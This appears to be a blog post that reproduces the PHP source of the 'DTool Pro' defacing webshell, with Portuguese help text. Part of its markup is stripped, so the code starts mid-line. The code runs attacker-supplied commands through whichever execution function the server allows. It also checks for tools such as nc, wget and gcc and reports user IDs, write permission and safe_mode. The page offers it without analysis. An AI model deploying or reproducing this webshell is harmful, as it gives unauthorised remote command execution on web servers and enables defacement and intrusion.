DTool Pro.php webshell

发表于 2015年10月26日
webshell
更新于 2016年07月29日 15:11:15 下午
dtools pro webshell
xterm at /usr/X11R6/bin/xterm, ";
}
if ( @file_exists( "/usr/bin/nc" ) ) {
	$pro2 = "nc at /usr/bin/nc, ";
}
if ( @file_exists( "/usr/bin/wget" ) ) {
	$pro3 = "wget at /usr/bin/wget, ";
}
if ( @file_exists( "/usr/bin/lynx" ) ) {
	$pro4 = "lynx at /usr/bin/lynx, ";
}
if ( @file_exists( "/usr/bin/gcc" ) ) {
	$pro5 = "gcc at /usr/bin/gcc, ";
}
if ( @file_exists( "/usr/bin/cc" ) ) {
	$pro6 = "cc at /usr/bin/cc ";
}
$safe = @ini_get( $safemode );
if ( $safe ) {
	$pro8 = "safe_mode: YES, ";
} else {
	$pro7 = "safe_mode: NO, ";
}
$pro8= "PHP " . phpversion();
$pro = $pro1 . $pro2 . $pro3 . $pro4 . $pro5 . $pro6 . $pro7 . $pro8;
$login = @posix_getuid();
$euid= @posix_geteuid();
$gid = @posix_getgid();
$ip= @gethostbyname( $_SERVER['HTTP_HOST'] );

//Turns the 'ls' command more usefull, showing it as it looks in the shell
if ( strpos( $cmd, 'ls --' ) !== false ) {
	$cmd = str_replace( 'ls --', 'ls -F --', $cmd );
} else if ( strpos( $cmd, 'ls -' ) !== false ) {
	$cmd = str_replace( 'ls -', 'ls -F', $cmd );
} else if ( strpos( $cmd, ';ls' ) !== false ) {
	$cmd = str_replace( ';ls', ';ls -F', $cmd );
} else if ( strpos( $cmd, '; ls' ) !== false ) {
	$cmd = str_replace( '; ls', ';ls -F', $cmd );
} else if ( $cmd == 'ls' ) {
	$cmd = "ls -F";
}

//If there are some '//' in the cmd, its now removed
if ( strpos( $chdir, '//' ) !== false ) {
	$chdir = str_replace( '//', '/', $chdir );
}
?>




	
		
			[ Defacing Tool Pro v ] ?

					by r3v3ng4ns - revengans@gmail.com 
				
		
	
	
		
			
				
					
					
						: 
					

				
					
						user: uid() euid() gid()
					
				
				
					
						write permission:YES";
							} else {
								echo " no";
							}
							?>
					
				
				
					
						server info: 
					
				
				
					
						pro info: ip 
					
				
				
					
					
						original path: 
					

				
					
						current path: 
						
					
				
			
		
	
	
		
			
				
					
						
							
								
									
										command
									
									
										
									
								
							
							
								
									
										 array(
													"pipe",
													"r"
												),
												1 => array(
													"pipe",
													"w"
												),
												2 => array(
													"pipe",
													"w"
												)
											)
											) {
												$process = @proc_open( "$what", $descpec, $pipes );
												if ( is_resource( $process ) ) {
													fwrite( $pipes[0], "" );
													fclose( $pipes[0] );

													while ( ! feof( $pipes[2] ) ) {
														$erro_retorno = fgets( $pipes[2], 4096 );
														if ( ! empty( $erro_retorno ) ) {
															echo $erro_retorno;
														} //isso mostra tds os erros
													}
													fclose( $pipes[2] );

													while ( ! feof( $pipes[1] ) ) {
														echo fgets( $pipes[1], 4096 );
													}
													fclose( $pipes[1] );

													$ok_p_fecha = @proc_close( $process );
												} else {
													echo "It seems that this PHP version (" . phpversion() . ") doesn't support proc_open() function";
												}
											} else {
												echo "This PHP version ($pro7) doesn't have the proc_open() or this function is disabled by php.ini";
											}
										}

										$funE = "function_exists";
										if ( $safe ) {
											$fe = "safemode";
											$feshow = $fe;
										} elseif ( $funE( 'shell_exec' ) ) {
											$fe = "shell";
											$feshow = "shell_exec";
										} elseif ( $funE( 'passthru' ) ) {
											$fe = "passthru";
											$feshow = $fe;
										} elseif ( $funE( 'system' ) ) {
											$fe = "system";
											$feshow = $fe;
										} elseif ( $funE( 'exec' ) ) {
											$fe = "execc";
											$feshow = "exec";
										} elseif ( $funE( 'popen' ) ) {
											$fe = "popenn";
											$feshow = "popen";
										} elseif ( $funE( 'proc_open' ) ) {
											$fe = "procc";
											$feshow = "proc_open";
										} else {
											$fe = "nofunction";
											$feshow = $fe;
										}
										if ( $fu != "0" or ! empty( $fu ) ) {
											if ( $fu == 1 ) {
												$fe = "passthru";
												$feshow = $fe;
											}
											if ( $fu == 2 ) {
												$fe = "system";
												$feshow = $fe;
											}
											if ( $fu == 3 ) {
												$fe = "execc";
												$feshow = "exec";
											}
											if ( $fu == 4 ) {
												$fe = "popenn";
												$feshow = "popen";
											}
											if ( $fu == 5 ) {
												$fe = "shell";
												$feshow = "shell_exec";
											}
											if ( $fu == 6 ) {
												$fe = "procc";
												$feshow = "proc_open";
											}
										}
										$fe( "$cmd 2>&1" );
										$output = ob_get_contents();
										ob_end_clean();
										?>
									 


											
								
							
						
					
				
			
		
	
	
		
			
stdOut from $cmdShow\", using $feshow()"; ?>
<?php
echo $ch_msg;
if ( empty( $cmd ) and $ch_msg == "" ) {
	echo( "Comandos Exclusivos do DTool Pro\n\nchdir <diretorio>; outros; cmds;\nMuda o diretorio para aquele especificado e permanece nele. Eh como se fosse o 'cd' numa shell, mas precisa ser o primeiro da linha. Os arquivos listados pelo filelist sao o do diretorio especificado ex: chdir /diretorio/sub/;pwd;ls\n\nPHPget, PHPwriter, Fileditor, File List e Overwrite\nfale com o r3v3ng4ns :P" );
}
if ( ! empty( $output ) ) {
	echo str_replace( ">", ">", str_replace( "<", "<", $output ) );
}
?>